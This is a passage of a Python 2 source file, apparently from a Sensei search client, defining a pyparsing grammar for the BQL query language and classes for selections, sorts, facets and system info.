PARAM_SYSINFO_CLUSTERINFO = "clusterinfo"
PARAM_SYSINFO_CLUSTERINFO_ID = "id"
PARAM_SYSINFO_CLUSTERINFO_PARTITIONS = "partitions"
PARAM_SYSINFO_CLUSTERINFO_NODELINK = "nodelink"
PARAM_SYSINFO_CLUSTERINFO_ADMINLINK = "adminlink"
PARAM_RESULT_HITS_EXPL_VALUE = "value"
PARAM_RESULT_HITS_EXPL_DESC = "description"
PARAM_RESULT_HITS_EXPL_DETAILS = "details"
PARAM_RESULT_FACET_INFO_VALUE = "value"
PARAM_RESULT_FACET_INFO_COUNT = "count"
PARAM_RESULT_FACET_INFO_SELECTED = "selected"
# Group by related column names
GROUP_VALUE = "groupvalue"
GROUP_HITS = "grouphits"
# Default constants
DEFAULT_REQUEST_OFFSET = 0
DEFAULT_REQUEST_COUNT = 10
DEFAULT_REQUEST_MAX_PER_GROUP = 10
DEFAULT_FACET_MINHIT = 1
DEFAULT_FACET_MAXHIT = 10
DEFAULT_FACET_ORDER = PARAM_FACET_ORDER_HITS
#
# Definition of the BQL statement grammar
#
from pyparsing import Literal, CaselessLiteral, Word, Upcase, delimitedList, Optional, \
Combine, Group, alphas, nums, alphanums, ParseException, Forward, oneOf, quotedString, \
ZeroOrMore, restOfLine, Keyword, OnlyOnce, Suppress, removeQuotes, NotAny, OneOrMore, MatchFirst
"""
BNF Grammar for BQL
===================
<statement> ::= ( <select_stmt> | <describe_stmt> ) [';']
<select_stmt> ::= SELECT <select_list> <from_clause> [<where_clause>] [<given_clause>] <additional_clauses>
<describe_stmt> ::= ( DESC | DESCRIBE ) <index_name>
<select_list> ::= '*' | <column_name_list>
<column_name_list> ::= <column_name> ( ',' <column_name> )*
<from_clause> ::= FROM <index_name>
<where_clause> ::= WHERE <search_condition>
<search_condition> ::= <predicates>
| <cumulative_predicates>
<predicates> ::= <predicate> ( AND <predicate> )*
<predicate> ::= <in_predicate>
| <contains_all_predicate>
| <equal_predicate>
| <not_equal_predicate>
| <query_predicate>
| <between_predicate>
| <same_column_or_pred>
<in_predicate> ::= <column_name> [NOT] IN <value_list> [<except_clause>] [<predicate_props>]
<contains_all_predicate> ::= <column_name> CONTAINS ALL <value_list> [<except_clause>] [<predicate_props>]
<equal_predicate> ::= <column_name> '=' <value> [<predicate_props>]
<not_equal_predicate> ::= <column_name> '<>' <value> [<predicate_props>]
<query_predicate> ::= QUERY IS <quoted_string>
<between_predicate> ::= <column_name> [NOT] BETWEEN <value> AND <value>
<same_column_or_pred> ::= '(' + <cumulative_predicates> + ')'
<cumulative_predicates> ::= <cumulative_predicate> ( ',' <cumulative_predicate> )*
<cumulative_predicate> ::= <in_predicate>
| <equal_predicate>
| <between_predicate>
<value_list> ::= '(' <value> ( ',' <value> )* ')'
<value> ::= <quoted_string> | <num>
<except_clause> ::= EXCEPT <value_list>
<predicate_props> ::= WITH <prop_list>
<prop_list> ::= '(' <key_value_pair> ( ',' <key_value_pair> )* ')'
<key_value_pair> ::= <quoted_string> ':' <quoted_string>
<given_clause> ::= GIVEN FACET PARAM <facet_param_list>
<facet_param_list> ::= <facet_param> ( ',' <facet_param> )*
<facet_param> ::= '(' <facet_name> <facet_param_name> <facet_param_type> <facet_param_value> ')'
<facet_param_name> ::= <quoted_string>
<facet_param_type> ::= BOOLEAN | INT | LONG | STRING | BYTEARRAY | DOUBLE
<facet_param_value> ::= <quoted_string>
<additional_clauses> ::= ( <additional_clause> )*
<additional_clause> ::= <order_by_clause>
| <group_by_clause>
| <limit_clause>
| <browse_by_clause>
| <fetching_stored_clause>
<order_by_clause> ::= ORDER BY <sort_specs>
<sort_specs> ::= <sort_spec> ( ',' <sort_spec> )*
<sort_spec> ::= <column_name> [<ordering_spec>]
<ordering_spec> ::= ASC | DESC
<group_by_clause> ::= GROUP BY <group_spec>
<group_spec> ::= <facet_name> [TOP <max_per_group>]
<limit_clause> ::= LIMIT [<offset> ','] <count>
<offset> ::= ( <digit> )+
<count> ::= ( <digit> )+
<browse_by_clause> ::= BROWSE BY <facet_specs>
<facet_specs> ::= <facet_spec> ( ',' <facet_spec> )*
<facet_spec> ::= <facet_name> [<facet_expression>]
<facet_expression> ::= '(' <expand_flag> <count> <count> <facet_ordering> ')'
<expand_flag> ::= TRUE | FALSE
<facet_ordering> ::= HITS | VALUE
<fetching_stored_clause> ::= FETCHING STORED [<fetching_flag>]
<fetching_flag> ::= TRUE | FALSE
<quoted_string> ::= '"' ( <char> )* '"'
| "'" ( <char> )* "'"
<identifier> ::= <identifier_start> ( <identifier_part> )*
<identifier_start> ::= <alpha> | '-' | '_'
<identifier_part> ::= <identifier_start> | <digit>
<column_name> ::= <identifier>
<facet_name> ::= <identifier>
<alpha> ::= <alpha_lower_case> | <alpha_upper_case>
<alpha_upper_case> ::= A | B | C | D | E | F | G | H | I | J | K | L | M | N | O
| P | Q | R | S | T | U | V | W | X | Y | Z
<alpha_lower_case> ::= a | b | c | d | e | f | g | h | i | j | k | l | m | n | o
| p | q | r | s | t | u | v | w | x | y | z
<digit> ::= 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
<num> ::= ( <digit> )+
"""
def order_by_act(s, loc, tok):
  """Parse action for ORDER BY: reject a direction after the 'relevance' sort.

  Sorting by relevance is score-based, so an explicit ASC/DESC after it is
  a user error and raises a ParseException.
  """
  for order in tok[1:]:
    if (order[0] == PARAM_SORT_SCORE and len(order) > 1):
      raise ParseException(s, loc, "%s should not be followed by %s"
                           % (PARAM_SORT_SCORE, order[1]))
# Parse actions that may fire at most once per statement (pyparsing's
# OnlyOnce raises on a second match); reset_all() re-arms them between parses.
limit_once = OnlyOnce(lambda s, loc, tok: tok)
order_by_once = OnlyOnce(order_by_act)
group_by_once = OnlyOnce(lambda s, loc, tok: tok)
browse_by_once = OnlyOnce(lambda s, loc, tok: tok)
fetching_stored_once = OnlyOnce(lambda s, loc, tok: tok)
def reset_all():
  """Re-arm every OnlyOnce parse action so the grammar can parse again."""
  limit_once.reset()
  order_by_once.reset()
  group_by_once.reset()
  browse_by_once.reset()
  fetching_stored_once.reset()
#
# BQL tokens
#
# Remember to use lower case in the definition because we use
# Keyword.match to do comparison at other places in the code.
#
ALL = Keyword("all", caseless=True)
AND = Keyword("and", caseless=True)
ASC = Keyword("asc", caseless=True)
BETWEEN = Keyword("between", caseless=True)
BOOLEAN = Keyword("boolean", caseless=True)
BROWSE = Keyword("browse", caseless=True)
BY = Keyword("by", caseless=True)
BYTEARRAY = Keyword("bytearray", caseless=True)
CONTAINS = Keyword("contains", caseless=True)
DESC = Keyword("desc", caseless=True)
DESCRIBE = Keyword("describe", caseless=True)
DOUBLE = Keyword("double", caseless=True)
EXCEPT = Keyword("except", caseless=True)
FACET = Keyword("facet", caseless=True)
FALSE = Keyword("false", caseless=True)
FETCHING = Keyword("fetching", caseless=True)
FROM = Keyword("from", caseless=True)
GROUP = Keyword("group", caseless=True)
GIVEN = Keyword("given", caseless=True)
HITS = Keyword("hits", caseless=True)
IN = Keyword("in", caseless=True)
INT = Keyword("int", caseless=True)
IS = Keyword("is", caseless=True)
LIMIT = Keyword("limit", caseless=True)
LONG = Keyword("long", caseless=True)
NOT = Keyword("not", caseless=True)
OR = Keyword("or", caseless=True)
ORDER = Keyword("order", caseless=True)
PARAM = Keyword("param", caseless=True)
QUERY = Keyword("query", caseless=True)
SELECT = Keyword("select", caseless=True)
STORED = Keyword("stored", caseless=True)
STRING = Keyword("string", caseless=True)
TOP = Keyword("top", caseless=True)
TRUE = Keyword("true", caseless=True)
VALUE = Keyword("value", caseless=True)
WHERE = Keyword("where", caseless=True)
WITH = Keyword("with", caseless=True)
keyword = MatchFirst((ALL, AND, ASC, BETWEEN, BOOLEAN, BROWSE, BY, BYTEARRAY,
CONTAINS, DESC, DESCRIBE, DOUBLE, EXCEPT,
FACET, FALSE, FETCHING, FROM, GROUP, GIVEN,
HITS, IN, INT, IS, LIMIT, LONG, NOT,
OR, ORDER, PARAM, QUERY,
SELECT, STORED, STRING, TOP, TRUE,
VALUE, WHERE, WITH
))
LPAR, RPAR, COMMA, COLON, SEMICOLON = map(Suppress,"(),:;")
EQUAL = "="
NOT_EQUAL = "<>"
select_stmt = Forward()
ident = Word(alphas, alphanums + "_$")
column_name = ~keyword + Word(alphas, alphanums + "_-")
facet_name = column_name.copy()
column_name_list = Group(delimitedList(column_name))
int_num = Word(nums).setParseAction(lambda t: int(t[0]))
quotedString.setParseAction(removeQuotes)
value = (int_num | quotedString)
value_list = LPAR + delimitedList(value) + RPAR
prop_pair = (quotedString + COLON + value)
predicate_props = (WITH + LPAR + delimitedList(prop_pair).setResultsName("prop_list") + RPAR)
in_predicate = (column_name + Optional(NOT) +
IN + value_list.setResultsName("value_list") +
Optional(EXCEPT + value_list.setResultsName("except_values")) +
Optional(predicate_props)
).setResultsName("in_pred")
contains_all_predicate = (column_name +
CONTAINS + ALL + value_list.setResultsName("value_list") +
Optional(EXCEPT + value_list.setResultsName("except_values")) +
Optional(predicate_props)
).setResultsName("contains_all_pred")
equal_predicate = (column_name +
EQUAL + value +
Optional(predicate_props)).setResultsName("equal_pred")
not_equal_predicate = (column_name +
NOT_EQUAL + value +
Optional(predicate_props)).setResultsName("not_equal_pred")
query_predicate = (QUERY + IS + quotedString).setResultsName("query_pred")
between_predicate = (column_name + Optional(NOT) +
BETWEEN + value + AND + value).setResultsName("between_pred")
cumulative_predicate = Group(in_predicate
| equal_predicate
| between_predicate
).setResultsName("cumulative_preds", listAllMatches=True)
cumulative_predicates = (cumulative_predicate +
OneOrMore(OR + cumulative_predicate))
same_column_or_pred = (LPAR + cumulative_predicates + RPAR).setResultsName("same_column_or_pred")
predicate = Group(in_predicate
| contains_all_predicate
| equal_predicate
| not_equal_predicate
| query_predicate
| between_predicate
| same_column_or_pred
).setResultsName("predicates", listAllMatches=True)
predicates = predicate + NotAny(OR) + ZeroOrMore(AND + predicate)
search_condition = Group(predicates | cumulative_predicates)
param_type = BOOLEAN | INT | LONG | STRING | BYTEARRAY | DOUBLE
facet_param = Group(LPAR + facet_name + COMMA + quotedString + COMMA +
param_type + COMMA + value + RPAR).setResultsName("facet_param", listAllMatches=True)
given_clause = (GIVEN + FACET + PARAM + delimitedList(facet_param))
orderseq = ASC | DESC
order_by_expression = Forward()
order_by_spec = Group(column_name + Optional(orderseq)).setResultsName("orderby_spec", listAllMatches=True)
order_by_expression << (order_by_spec + ZeroOrMore(COMMA + order_by_expression))
order_by_clause = (ORDER + BY + order_by_expression).setResultsName("orderby").setParseAction(order_by_once)
limit_clause = (LIMIT + Group(Optional(int_num + COMMA) + int_num)).setResultsName("limit").setParseAction(limit_once)
expand_flag = TRUE | FALSE
facet_order_by = HITS | VALUE
facet_spec = Group(column_name +
Optional(LPAR + expand_flag + COMMA + int_num + COMMA + int_num + COMMA + facet_order_by + RPAR))
group_by_clause = (GROUP + BY +
column_name.setResultsName("groupby") +
Optional(TOP + int_num.setResultsName("max_per_group"))).setParseAction(group_by_once)
browse_by_clause = (BROWSE + BY +
delimitedList(facet_spec).setResultsName("facet_specs")).setParseAction(browse_by_once)
fetching_flag = TRUE | FALSE
fetching_stored_clause = (FETCHING + STORED +
Optional(fetching_flag)).setResultsName("fetching_stored").setParseAction(fetching_stored_once)
additional_clause = (order_by_clause
| limit_clause
| group_by_clause
| browse_by_clause
| fetching_stored_clause
)
additional_clauses = ZeroOrMore(additional_clause)
select_stmt << (SELECT +
('*' | column_name_list).setResultsName("columns") +
FROM +
ident.setResultsName("index") +
Optional(WHERE + search_condition.setResultsName("where")) +
Optional(given_clause.setResultsName("given")) +
additional_clauses
)
describe_stmt = (DESC | DESCRIBE).setResultsName("describe") + ident.setResultsName("index")
BQLstmt = (select_stmt | describe_stmt) + Optional(SEMICOLON)
# Define comment format, and ignore them
sql_comment = "--" + restOfLine
BQLstmt.ignore(sql_comment)
def safe_str(obj):
  """Return the byte string representation of obj.

  Python 2 helper: when str() fails because obj is a unicode string with
  non-ASCII characters, fall back to an escaped byte encoding.
  """
  try:
    return str(obj)
  except UnicodeEncodeError:
    # obj is unicode
    return unicode(obj).encode("unicode_escape")
def merge_values(list1, list2):
  """Merge two lists and dedup.

  Note: when list1 is empty, list2 is returned untouched (and therefore
  NOT deduped), matching the original short-circuit behaviour. Otherwise
  the merged result's ordering is unspecified (set-based).
  """
  if not list1:
    return list2
  return list(set(list1) | set(list2))
def collapse_cumulative_preds(cumulative_preds):
  """Collapse cumulative predicates into one selection.

  All predicates must target the same column and be positive (no excludes);
  their value lists are merged (OR semantics) into a single SenseiSelection.
  Raises SenseiClientError when a different column or a negative predicate
  appears.
  """
  # XXX Need to consider props here too
  select = None
  selections = []
  field = None
  for pred in cumulative_preds:
    tmp = build_selection(pred)
    # First predicate fixes the column; later ones must match it.
    if not field and tmp:
      field = tmp.field
    elif tmp.field != field:
      raise SenseiClientError("A different column '%s' appeared in cumulative predicates"
                              % tmp.field)
    elif tmp.excludes:
      raise SenseiClientError("Negative predicate for column '%s' appeared in cumulative predicates"
                              % tmp.field)
    selections.append(tmp)
  if not selections:
    select = None
  elif len(selections) == 1:
    select = selections[0]
  else:
    # Merge all value lists into one OR-selection on the shared column.
    values = selections[0].values
    select = SenseiSelection(field, PARAM_SELECT_OP_OR)
    for i in xrange(1, len(selections)):
      values = merge_values(values, selections[i].values)
    select.values = values
  return select
def build_selection(predicate):
  """Build a SenseiSelection based on a predicate.

  Dispatches on the predicate's parse-result name (in_pred,
  contains_all_pred, equal_pred, not_equal_pred, between_pred,
  same_column_or_pred) and returns None for unrecognized predicates
  (e.g. query_pred, which is handled by the caller).
  """
  select = None
  if predicate.in_pred:
    # IN list: OR semantics; NOT IN flips values into excludes.
    select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
    is_not = predicate[1] == NOT.match
    for val in predicate.value_list:
      select.addSelection(val, is_not)
    for val in predicate.except_values:
      select.addSelection(val, not is_not)
    # prop_list alternates key, value — consume it pairwise.
    for i in xrange(0, len(predicate.prop_list), 2):
      select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
  elif predicate.contains_all_pred:
    # CONTAINS ALL: AND semantics; EXCEPT values become excludes.
    select = SenseiSelection(predicate[0], PARAM_SELECT_OP_AND)
    for val in predicate.value_list:
      select.addSelection(val)
    for val in predicate.except_values:
      select.addSelection(val, True)
    for i in xrange(0, len(predicate.prop_list), 2):
      select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
  elif predicate.equal_pred:
    select = SenseiSelection(predicate[0], PARAM_SELECT_OP_AND)
    select.addSelection(predicate[2])
    for i in xrange(0, len(predicate.prop_list), 2):
      select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
  elif predicate.not_equal_pred:
    select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
    select.addSelection(predicate[2], True)
    for i in xrange(0, len(predicate.prop_list), 2):
      select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
  elif predicate.between_pred:
    # Token layout differs for BETWEEN vs NOT BETWEEN (extra NOT token).
    if predicate[1] == BETWEEN.match:
      select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
      select.addSelection("[%s TO %s]" % (predicate[2], predicate[4]))
    else:
      select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
      select.addSelection("[%s TO %s]" % (predicate[3], predicate[5]), True)
  elif predicate.same_column_or_pred:
    select = collapse_cumulative_preds(predicate.cumulative_preds)
  return select
class BQLRequest:
  """A Sensei request with a BQL statement.

  The BQL statement can be one of the following statements:

  1. SELECT
  2. DESCRIBE
  """

  def __init__(self, sql_stmt):
    # Parse eagerly; reset_all() must always run so the OnlyOnce parse
    # actions are re-armed for the next statement.
    try:
      self.tokens = BQLstmt.parseString(sql_stmt, parseAll=True)
    except ParseException as err:
      raise err
    finally:
      reset_all()
    self.query = ""
    self.selections = None
    self.selection_list = []
    self.sorts = None
    self.columns = [safe_str(col) for col in self.tokens.columns]
    self.facet_init_param_map = None
    if self.tokens.describe:
      self.stmt_type = "desc"
    else:
      self.stmt_type = "select"
    # Turn the WHERE clause tokens into SenseiSelection objects (or a
    # free-text query for QUERY IS ...).
    where = self.tokens.where
    if where:
      if where.predicates:
        for predicate in where.predicates:
          if predicate.query_pred:
            self.query = predicate[2]
          else:
            select = build_selection(predicate)
            if select:
              self.selection_list.append(select)
      elif where.cumulative_preds:
        select = collapse_cumulative_preds(where.cumulative_preds)
        self.selection_list.append(select)

  def get_stmt_type(self):
    """Get the statement type ("select" or "desc")."""
    return self.stmt_type

  def get_offset(self):
    """Get the offset, or None when LIMIT had no offset part."""
    limit = self.tokens.limit
    if limit:
      if len(limit[1]) == 2:
        return limit[1][0]
      else:
        return None
    else:
      return None

  def get_count(self):
    """Get the row count from LIMIT, or None when no LIMIT was given."""
    limit = self.tokens.limit
    if limit:
      if len(limit[1]) == 2:
        return limit[1][1]
      else:
        return limit[1][0]
    else:
      return None

  def get_index(self):
    """Get the index (i.e. table) name."""
    return self.tokens.index

  def get_columns(self):
    """Get the list of selected columns."""
    return self.columns

  def get_query(self):
    """Get the query string."""
    return self.query

  def get_sorts(self):
    """Get the SenseiSort array based on ORDER BY (computed lazily once)."""
    if self.sorts:
      return self.sorts
    self.sorts = []
    orderby = self.tokens.orderby
    if orderby:
      orderby_spec = orderby.orderby_spec
      for spec in orderby_spec:
        if len(spec) == 1:
          self.sorts.append(SenseiSort(spec[0]))
        else:
          self.sorts.append(SenseiSort(spec[0], spec[1] == "desc"))
    return self.sorts

  def merge_selections(self):
    """Merge all selections per column and detect conflicts.

    Returns (ok, error_message); error_message is None on success.
    """
    self.selections = {}
    for select in self.selection_list:
      existing = self.selections.get(select.field)
      if existing:
        if existing.values and select.values:
          return False, "There is conflict in selection(s) for column '%s'" % select.field
        if select.values:
          existing.values = select.values
        if select.excludes:
          existing.excludes = merge_values(existing.excludes,
                                           select.excludes)
        # XXX How about props?
      else:
        self.selections[select.field] = select
    return True, None

  def get_selections(self):
    """Get all the selections from the statement."""
    if self.selections is None:
      # BUG FIX: this previously called the bare name merge_selections(),
      # which raised NameError at runtime — the method lives on self.
      self.merge_selections()
    return self.selections

  def get_facets(self):
    """Get facet specs as a dict of facet name -> SenseiFacet."""
    facet_specs = self.tokens.facet_specs
    if not facet_specs:
      return {}
    facets = {}
    for spec in facet_specs:
      facet = None
      if len(spec) == 1:
        # Bare facet name: use the default expansion/min/max/order.
        facet = SenseiFacet(False,
                            DEFAULT_FACET_MINHIT,
                            DEFAULT_FACET_MAXHIT,
                            DEFAULT_FACET_ORDER)
      else:
        facet = SenseiFacet(spec[1] == "true",
                            spec[2],
                            spec[3],
                            spec[4] == "hits" and PARAM_FACET_ORDER_HITS or PARAM_FACET_ORDER_VAL)
      facets[spec[0]] = facet
    return facets

  def get_groupby(self):
    """Get the GROUP BY facet name, or None."""
    if self.tokens.groupby:
      return self.tokens.groupby[0]
    else:
      return None

  def get_max_per_group(self):
    """Get the TOP value of GROUP BY, or None."""
    if self.tokens.max_per_group:
      return self.tokens.max_per_group
    else:
      return None

  def get_fetching_stored(self):
    """Get the fetching-stored flag (defaults to True when absent)."""
    fetching_stored = self.tokens.fetching_stored
    if (not fetching_stored or
        len(fetching_stored) == 2 or
        fetching_stored[2] == "true"):
      return True
    else:
      return False

  def get_facet_init_param_map(self):
    """Get run-time facet handler initialization parameters (lazy)."""
    if self.facet_init_param_map:
      return self.facet_init_param_map
    self.facet_init_param_map = {}
    given = self.tokens.given
    if given:
      for param in given.facet_param:
        facet = param[0]
        name = param[1]
        param_type = param[2]
        value = param[3]
        init_param = SenseiFacetInitParams()
        # Route the value into the map matching its declared BQL type.
        if param_type == "boolean":
          init_param.put_bool_param(name, value)
        elif param_type == "int":
          init_param.put_int_param(name, value)
        elif param_type == "long":
          init_param.put_long_param(name, value)
        elif param_type == "string":
          init_param.put_string_param(name, value)
        elif param_type == "bytearray":
          init_param.put_byte_param(name, value)
        elif param_type == "double":
          init_param.put_double_param(name, value)
        self.facet_init_param_map[facet] = init_param
    return self.facet_init_param_map
def test(str):
  """Ad-hoc debugging helper: parse a BQL string and dump every token group.

  NOTE(review): the parameter shadows the built-in ``str`` — harmless here,
  but worth renaming eventually. Python 2 print statements throughout.
  Parse errors are silently swallowed; the grammar state is always reset.
  """
  try:
    tokens = BQLstmt.parseString(str)
    print "tokens =", tokens
    print "tokens.columns =", tokens.columns
    print "tokens.index =", tokens.index
    print "tokens.where =", tokens.where
    if tokens.where:
      print "tokens.where.predicates =", tokens.where.predicates
      print "tokens.where.cumulative_preds =", tokens.where.cumulative_preds
      for predicate in tokens.where.predicates:
        print "--------------------------------------"
        print "predicate.value_list =", predicate.value_list
        print "predicate.except_values =", predicate.except_values
        print "predicate.prop_list =", predicate.prop_list
        if predicate.cumulative_preds:
          print "predicate.cumulative_preds =", predicate.cumulative_preds
    print "tokens.orderby =", tokens.orderby
    if tokens.orderby:
      print "tokens.orderby.orderby_spec =", tokens.orderby.orderby_spec
    print "tokens.limit =", tokens.limit
    print "tokens.facet_specs =", tokens.facet_specs
    print "tokens.groupby =", tokens.groupby
    print "tokens.max_per_group =", tokens.max_per_group
    print "tokens.given =", tokens.given
    if tokens.given:
      print "tokens.given.facet_param =", tokens.given.facet_param
    print "tokens.fetching_stored =", tokens.fetching_stored
  except ParseException as err:
    # print " " * (err.loc + 2) + "^\n" + err.msg
    pass
  finally:
    reset_all()
class SenseiClientError(Exception):
  """Raised for any error coming out of the Sensei client."""

  def __init__(self, value):
    self.value = value

  def __str__(self):
    return "%r" % (self.value,)
class SenseiFacet:
  """Facet display spec: expansion flag, min hit count, max values, ordering."""

  def __init__(self, expand=False, minHits=1, maxCounts=10, orderBy=PARAM_FACET_ORDER_HITS):
    # Plain value object: store the settings verbatim.
    self.expand, self.minHits = expand, minHits
    self.maxCounts, self.orderBy = maxCounts, orderBy
class SenseiSelection:
  """A facet selection: chosen values, excluded values, and extra properties."""

  def __init__(self, field, operation=PARAM_SELECT_OP_OR):
    self.field = field
    self.operation = operation
    self.values = []
    self.excludes = []
    self.properties = {}

  def __str__(self):
    return "Selection:%s:%s:%s:%s" % (self.field, self.operation,
                                      ','.join(self.values),
                                      ','.join(self.excludes))

  def _target(self, isNot):
    # Excluded values and included values live in separate lists.
    return self.excludes if isNot else self.values

  def addSelection(self, value, isNot=False):
    self._target(isNot).append(safe_str(value))

  def removeSelection(self, value, isNot=False):
    self._target(isNot).remove(safe_str(value))

  def addProperty(self, name, value):
    self.properties[name] = value

  def removeProperty(self, name):
    del self.properties[name]

  def _param_name(self, suffix):
    # Every REST parameter for this selection has the shape
    # "select.<field>.<suffix>".
    return "%s.%s.%s" % (PARAM_SELECT, self.field, suffix)

  def getSelectNotParam(self):
    return self._param_name(PARAM_SELECT_NOT)

  def getSelectNotParamValues(self):
    return ",".join(self.excludes)

  def getSelectOpParam(self):
    return self._param_name(PARAM_SELECT_OP)

  def getSelectValParam(self):
    return self._param_name(PARAM_SELECT_VAL)

  def getSelectValParamValues(self):
    return ",".join(self.values)

  def getSelectPropParam(self):
    return self._param_name(PARAM_SELECT_PROP)

  def getSelectPropParamValues(self):
    return ",".join(key + ":" + self.properties.get(key)
                    for key in self.properties.keys())
class SenseiSort:
  """Sort spec for one field; direction is omitted for the score/doc pseudo-fields."""

  def __init__(self, field, reverse=False):
    self.field = field
    # The relevance/doc pseudo-sorts carry their own direction, so no
    # explicit asc/desc is attached to them.
    special = (PARAM_SORT_SCORE, PARAM_SORT_SCORE_REVERSE,
               PARAM_SORT_DOC, PARAM_SORT_DOC_REVERSE)
    if field in special:
      self.dir = None
    else:
      self.dir = PARAM_SORT_DESC if reverse else PARAM_SORT_ASC

  def __str__(self):
    return self.buildSortField()

  def buildSortField(self):
    # "field:dir" when a direction applies, the bare field name otherwise.
    if self.dir is None:
      return self.field
    return self.field + ":" + self.dir
class SenseiFacetInitParams:
  """FacetHandler initialization parameters.

  Values are kept in a separate map per parameter type; every stored value
  is normalized to a list (scalars are wrapped in a one-element list).
  """

  def __init__(self):
    self.bool_map = {}
    self.int_map = {}
    self.long_map = {}
    self.string_map = {}
    self.byte_map = {}
    self.double_map = {}

  @staticmethod
  def _put(target_map, key, value):
    """Store value under key, wrapping a scalar into a one-element list.

    DRY refactor: the six put_*_param methods previously repeated this
    isinstance(value, list) check verbatim.
    """
    target_map[key] = value if isinstance(value, list) else [value]

  # Getters for param names for different types
  def get_bool_param_names(self):
    return self.bool_map.keys()

  def get_int_param_names(self):
    return self.int_map.keys()

  def get_long_param_names(self):
    return self.long_map.keys()

  def get_string_param_names(self):
    return self.string_map.keys()

  def get_byte_param_names(self):
    return self.byte_map.keys()

  def get_double_param_names(self):
    return self.double_map.keys()

  # Add param name, values
  def put_bool_param(self, key, value):
    self._put(self.bool_map, key, value)

  def put_int_param(self, key, value):
    self._put(self.int_map, key, value)

  def put_long_param(self, key, value):
    self._put(self.long_map, key, value)

  def put_string_param(self, key, value):
    self._put(self.string_map, key, value)

  def put_byte_param(self, key, value):
    self._put(self.byte_map, key, value)

  def put_double_param(self, key, value):
    self._put(self.double_map, key, value)

  # Getters of param value(s) based on param names (None when absent)
  def get_bool_param(self, key):
    return self.bool_map.get(key)

  def get_int_param(self, key):
    return self.int_map.get(key)

  def get_long_param(self, key):
    return self.long_map.get(key)

  def get_string_param(self, key):
    return self.string_map.get(key)

  def get_byte_param(self, key):
    return self.byte_map.get(key)

  def get_double_param(self, key):
    return self.double_map.get(key)
class SenseiFacetInfo:
  """Metadata for one facet: name, runtime flag, and a property dict."""

  def __init__(self, name, runtime=False, props=None):
    # BUG FIX: the default used to be a shared mutable dict (props={}),
    # so every instance built without props mutated the same object.
    self.name = name
    self.runtime = runtime
    self.props = {} if props is None else props

  def get_name(self):
    return self.name

  def set_name(self, name):
    self.name = name

  def get_runtime(self):
    return self.runtime

  def set_runtime(self, runtime):
    self.runtime = runtime

  def get_props(self):
    return self.props

  def set_props(self, props):
    self.props = props
class SenseiNodeInfo:
  """Read-only description of one Sensei cluster node."""

  def __init__(self, id, partitions, node_link, admin_link):
    # Plain value object; attributes are set once and read via getters.
    self.id, self.partitions = id, partitions
    self.node_link, self.admin_link = node_link, admin_link

  def get_id(self):
    return self.id

  def get_partitions(self):
    return self.partitions

  def get_node_link(self):
    return self.node_link

  def get_admin_link(self):
    return self.admin_link
class SenseiSystemInfo:
  """Parsed Sensei /sysinfo response: doc count, last-modified time,
  version and the facet definitions reported by the server."""
  def __init__(self, json_data):
    logger.debug("json_data = %s" % json_data)
    self.num_docs = int(json_data.get(PARAM_SYSINFO_NUMDOCS))
    self.last_modified = long(json_data.get(PARAM_SYSINFO_LASTMODIFIED))
    self.version = json_data.get(PARAM_SYSINFO_VERSION)
    self.facet_infos = []
    # One SenseiFacetInfo per facet entry in the JSON payload.
    for facet in json_data.get(PARAM_SYSINFO_FACETS):
      facet_info = SenseiFacetInfo(facet.get(PARAM_SYSINFO_FACETS_NAME),
                                   facet.get(PARAM_SYSINFO_FACETS_RUNTIME),
                                   facet.get(PARAM_SYSINFO_FACETS_PROPS))
      self.facet_infos.append(facet_info)
    # TODO: get cluster_info
    self.cluster_info = None
  def display(self):
    """Display sysinfo."""
    keys = ["facet_name", "facet_type", "runtime", "column", "column_type", "depends"]
    max_lens = None
    # XXX add existing flags
    def get_max_lens(columns):
      # Compute the widest cell per column so the ASCII table lines up.
      max_lens = {}
      for column in columns:
        max_lens[column] = len(column)
      for facet_info in self.facet_infos:
        props = facet_info.get_props()
        tmp_len = len(facet_info.get_name())
        if tmp_len > max_lens["facet_name"]:
          max_lens["facet_name"] = tmp_len
        tmp_len = len(props.get("type"))
        if tmp_len > max_lens["facet_type"]:
          max_lens["facet_type"] = tmp_len
        # runtime can only contain "true" or "false", so len("runtime")
        # is big enough
        tmp_len = len(props.get("column"))
        if tmp_len > max_lens["column"]:
          max_lens["column"] = tmp_len
        tmp_len = len(props.get("column_type"))
        if tmp_len > max_lens["column_type"]:
          max_lens["column_type"] = tmp_len
        tmp_len = len(props.get("depends"))
        if tmp_len > max_lens["depends"]:
          max_lens["depends"] = tmp_len
      return max_lens
    def print_line(char='-', sep_char='+'):
      # One horizontal border row, e.g. +----+------+, sized from max_lens.
      sys.stdout.write(sep_char)
      for key in keys:
        sys.stdout.write(char * (max_lens[key] + 2) + sep_char)
      sys.stdout.write('\n')
    def print_header():
      print_line('-', '+')
      sys.stdout.write('|')
      for key in keys:
        sys.stdout.write(' %s%s |' % (key, ' ' * (max_lens[key] - len(key))))
      sys.stdout.write('\n')
      print_line('-', '+')
    def print_footer():
      print_line('-', '+')
    max_lens = get_max_lens(keys)
    print_header()
    # One table row per facet; each value is left-padded to the column width.
    for facet_info in self.facet_infos:
      props = facet_info.get_props()
      sys.stdout.write('|')
      val = facet_info.get_name()
      sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["facet_name"] - len(val))))
      val = props.get("type")
      sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["facet_type"] - len(val))))
      val = facet_info.get_runtime() and "true" or "false"
      sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["runtime"] - len(val))))
      val = props.get("column")
      sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["column"] - len(val))))
      val = props.get("column_type")
      sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["column_type"] - len(val))))
      val = props.get("depends")
      sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["depends"] - len(val))))
      sys.stdout.write('\n')
    print_footer()
  def get_num_docs(self):
    return self.num_docs
  def set_num_docs(self, num_docs):
    self.num_docs = num_docs
  def get_last_modified(self):
    return self.last_modified
  def set_last_modified(self, last_modified):
    self.last_modified = last_modified
